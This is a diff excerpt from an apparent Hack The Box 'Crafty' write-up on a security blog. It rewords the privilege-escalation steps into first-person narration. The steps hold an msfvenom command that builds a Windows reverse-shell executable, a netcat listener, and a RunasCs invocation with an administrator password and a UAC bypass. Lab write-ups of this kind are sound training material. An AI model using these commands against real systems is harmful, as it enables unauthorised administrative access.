K-Scorpio/scorpiosec/content/en/posts/HTB-Crafty.md

 msfvenom -p windows/x64/shell_reverse_tcp lhost=<YOUR IP ADDRESS> lport=<PORT NUMBER> -f exe -a x64 --platform windows -o shell.exe
 ```

-Transfer `shell.exe` and `RunasCs.exe` to the target with the same method used for `nc.exe`.
+`shell.exe` and `RunasCs.exe` are transferred to the target using the same method employed for `nc.exe`.

 ![malicious file and runascs.exe on target](/images/HTB-Crafty/files-on-target.png)

-Setup another listener on the port you selected for your `msfvenom` payload.
+We setup another listener on the port selected for your `msfvenom` payload.

 ```
-rlwrap -cAr nc -lvp 8010
+rlwrap -cAr nc -lvp <PORT_NUMBER>
 ```

-Use `runasCs` in conjunction with your payload on the target.
+We then use `runasCs` in conjunction with the payload.

 ```
 .\runasCs.exe administrator s67u84zKq8IXw shell.exe --bypass-uac
 ```

-You get an administrative shell on your new listener.
+We get a connection on the listener, as `administrator`.

 ![admin shell](/images/HTB-Crafty/admin-shell.png)